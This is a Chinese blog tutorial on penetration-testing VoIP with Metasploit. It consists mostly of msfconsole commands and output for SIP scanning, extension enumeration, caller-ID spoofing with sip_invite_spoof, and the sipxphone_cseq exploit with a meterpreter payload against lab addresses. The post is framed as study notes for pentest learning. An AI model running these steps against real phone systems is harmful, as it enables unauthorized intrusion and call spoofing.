使用metasploit对VOIP渗透测试提权——SipXphone Version 2.0.6.27

最新推荐文章于 2021-12-14 11:52:42 发布
最新推荐文章于 2021-12-14 11:52:42 发布
阅读量468 收藏
点赞数 1
分类专栏: 精通Metasploit学习笔记 文章标签: metasploit kali linux 渗透测试 voip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116643780
版权

文章目录

前言

本文简单介绍了使用metasploit对VOIP服务进行渗透测试提权,目标程序SipXphone Version 2.0.6.27

一、对VOIP服务踩点

使用metasploit内置的sip扫描模块进行扫描

msf6 > use auxiliary/scanner/sip/options
msf6 auxiliary(scanner/sip/options) > options

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5060             yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host

msf6 auxiliary(scanner/sip/options) > set rhosts 192.168.1.1/24
rhosts => 192.168.1.1/24
msf6 auxiliary(scanner/sip/options) > run

[*] Sending SIP UDP OPTIONS requests to 192.168.1.0->192.168.1.255 (256 hosts)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

扫描到voip服务后使用enumerator进行进一步扫描(很遗憾,本人附近没有voip服务)

msf6 > use auxiliary/scanner/sip/enumerator
msf6 auxiliary(scanner/sip/enumerator) > options

Module options (auxiliary/scanner/sip/enumerator):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   MAXEXT     9999             yes       Ending extension
   METHOD     REGISTER         yes       Enumeration method (Accepted: OPTIONS, REGISTER)
   MINEXT     0                yes       Starting extension
   PADLEN     4                yes       Cero padding maximum length
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/sip/enumerator) > set maxext 9999	#分机号码结束地址
maxext => 9999
msf6 auxiliary(scanner/sip/enumerator) > set minext 0	#起始地址
minext => 0
msf6 auxiliary(scanner/sip/enumerator) > set rhosts 192.168.1.1/24
rhosts => 192.168.1.1/24
msf6 auxiliary(scanner/sip/enumerator) > run

二、欺骗性VOIP电话

msf6 > use auxiliary/voip/sip_invite_spoof
msf6 auxiliary(voip/sip_invite_spoof) > options

Module options (auxiliary/voip/sip_invite_spoof):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   DOMAIN                             no        Use a specific SIP domain
   EXTENSION                          no        The specific extension or name to target
   MSG        The Metasploit has you  yes       The spoofed caller id to send
   RPORT      5060                    yes       The target port (UDP)
   SRCADDR    192.168.1.1             yes       The sip address the spoofed call is coming from
   THREADS    1                       yes       The number of concurrent threads (max one per host)

msf6 auxiliary(voip/sip_invite_spoof) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 auxiliary(voip/sip_invite_spoof) > run

[*] Sending Fake SIP Invite to: 192.168.1.106
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

三、对VOIP进行渗透

可以渗透VOIP服务的工具列表
Smap
Sipscan
Sipsak
Voipong
Svmap

本文章假定目标程序为SipXphone Version 2.0.6.27

msf6 > use exploit/windows/sip/sipxphone_cseq 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/sip/sipxphone_cseq) > options

Module options (exploit/windows/sip/sipxphone_cseq):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5060             yes       The target port (UDP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   SIPfoundry sipXphone 2.6.0.27 Universal


msf6 exploit(windows/sip/sipxphone_cseq) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 exploit(windows/sip/sipxphone_cseq) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/sip/sipxphone_cseq) > exploit

[*] Trying target SIPfoundry sipXphone 2.6.0.27 Universal...
[*] Started bind TCP handler against 192.168.1.106:4444
[*] Exploit completed, but no session was created.

因为本人名没有voip服务,所以攻击成功但未创建会话

总结

本文简单介绍了使用metasploit对VOIP服务进行渗透测试提权,因为无实例,所以只能提供方法,仅供学习

我重来不说话
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sipproxy:SIP代理-安全渗透测试工具
05-15
SIP代理-安全渗透测试工具 在所谓的“代理模式”中,应用程序充当VoIP PBX和UA(VoIP硬电话或软电话)之间的代理。 可以在正则表达式的帮助下嗅探和动态处理SIP流量。 可以修改和重新发送记录的SIP消息。 在“测试案例模式”中,可以针对特定目标运行指定为XML文件的预定义安全测试。 模糊技术是一种黑盒测试,可用于发现VoIP设备中的薄弱环节。 在这样的测试案例中,可以使用更多特定的模块。 例如Wordlist-或Bruteforce攻击。 在运行测试用例时,通过显示图形报告给出反馈,该报告随后可以在可打印的PDF文档中导出。
渗透之——利用Metasploit渗透VOIP
冰河的专栏
01-18 1207
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86536861 1.对VOIP服务踩点 use auxiliary/scanner/sip/options show options set RHOSTS 192.168.109.0/24 run 2.扫描VOIP服务 use auxiliary/scanner/sip...
Penetration Test 渗透测试
blogfeifei
03-14 518
目录 Author : ZwelLLast Updated : 2007.12.16 零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集 零、前言 渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethical hackin...
Metasploit初探索
Louisnie
10-12 673
渗透测试者的困扰: 需要掌握数百个工具软件,上千条命令参数,很难去全部记住. 对于新出现的漏洞PoC/EXP有不同的运行环境要求,准备工 作繁琐. 渗透工作者大部分时间都在学习不同工具的使用习惯,如果可以统一那么就方便的多. Metasploit简介: 目前最流行,最强大,最具有扩展性的渗透测试平台软件 基于Metasploit进行渗透测试和漏洞分析的流程和方法 2003年由HD More发布第...
metasploit渗透第二篇
hyty的博客
11-21 411
msf
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
关于Metasploit Framework与渗透测试相关知识
最新发布
12-28
使用Metasploit进行渗透测试时,必须遵守道德和法律规定,只在授权的情况下对目标系统进行测试,并确保测试不会对生产环境造成破坏。 总结,Metasploit Framework是渗透测试者的重要武器,它的强大功能和灵活扩展...
彻底改变VoIP渗透威胁的三步曲
10-22
圣地亚哥黑客会议局两个安全专家通过Cisco VoIPdia进入了其所在酒店的内部公共网络系统。有两名黑客说,他们是通过Wired.com网站一篇博客进入到了这家酒店财务系统和内部公共网络系统的,获取了酒店内部通话记录。他们使用了由一种叫VoIP Hopper提供的渗透测试模式。VoIP Hopper将模拟Cisco数据包每隔3分钟发送一次信息,转换成为新的以太网界面,通过博客的地址,用计算机代替酒店的电话系统转换到网络中去,以此来运转VoIP。由此可见VoIP是非常危险的,从某种角度上对网络产生了一定的安全威胁。 黑客通过VoIP渗透来窃取、私用企业的VoIP电话,造成了VoIP的不安全性
sipscan.rar
07-24
这是一个SIP信令的安全扫描工具,能帮助我们对我们的信令进行更安全的维护。
视频通话分析
12-14 5161
1:IP网络通讯协议 在传统电话系统中,一次通话从建立系统连接到拆除连接都需要一定的信令来配合完成。同样,在IP电话中,如何寻找被叫方、如何建立应答、如何按照彼此的数据处理能力发送数据,也需要相应的信令系统,一般称为协议。目前在国际上,比较有影响的IP电话方面的协议包括ITU-T提出的H.323协议和IETF提出的SIP协议。而MGCP主要应用于运营商市场,在行业市场鲜有应用。 1.1:协议概要分析 1.1.1:H323协议 H.323是ITU-T第16工作组的建议,由一组协议构成,其中有负责音频与
SIP协议固有的安全漏洞
-第二月-的专栏
12-05 3219
  同许多互联网协议一样,SIP(会话起始协议)协议是根据简化的思路,而不是根据安全的思路设计的。虽然H.323协议的创建是为了满足更广泛的目标,但是,安全问题也影响到了这个协议。这个协议本身就存在一些安全漏洞,把这个标准转化为产品的开发人员也为这个协议增加了一些安全漏洞。下面就是一些例子:  纯文本SIP信息是微不足道的,不值得修改或者插入,特别是在宽带网媒介上。虽然SIP没有加密,但是,可
关于SIP的源码地址
dolphin98629的专栏
07-17 1511
Below you will find descriptions and links to SIP and RTP stacks, applications, test utilities, SIP proxies, SIP PBXs and STUN server and clients. Most of them are open source :-), but not all of them
开源软电话 (Open Source Soft Phones)
weixin_41793707的博客
03-08 4411
开源软电话 (Open Source Soft Phones) 名字 描述 ActXPhone An ActiveX-Control SIP Softphone based on the Microsoft Real Time Communications (RTC) API.http://www.pernau.at/kd/voip/ActXPhone/. vb写的 Ekiga...
sip phone VOIP开源项目源码地址
hxhappy's eyes
06-17 4292
VoIP bookmarks from Klaus DarilionBelow you will find descriptions and links to SIP and RTP stacks, applications, test utilities, SIP proxies, SIP PBXs and STUN server and clients. Most of them are op
VoIP的原理及技术
u014353386的博客
04-01 9606
VoIP的原理及技术    通过因特网进行语音通信是一个非常复杂的系统工程,其应用面很广,因此涉及的技术也特别多,其中最根本的技术是VoIP (Voice over IP)技术,可以说,因特网语音通信是VoIP技术的一个最典型的、也是最有前景的应用领域。因此在讨论用因特网进行语音通信之前,有必要首先分析VoIP的基本原理,以及VoIP中的相关技术问题。   一、 VoIP的基本传输过程
VulnVoIP
Nixawk
02-09 3507
主机探测目标: 192.168.108.196 目的: 了解VoIP相关安全问题探测主机开放 tcp/udp 端口, 获取端口相关的服务信息. [nixawk@core share]$ nmap -A -n -p 22,53,80,111,907,3306,4445,5038 192.168.108.196Starting Nmap 6.47 ( http://nmap.org ) at 201
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值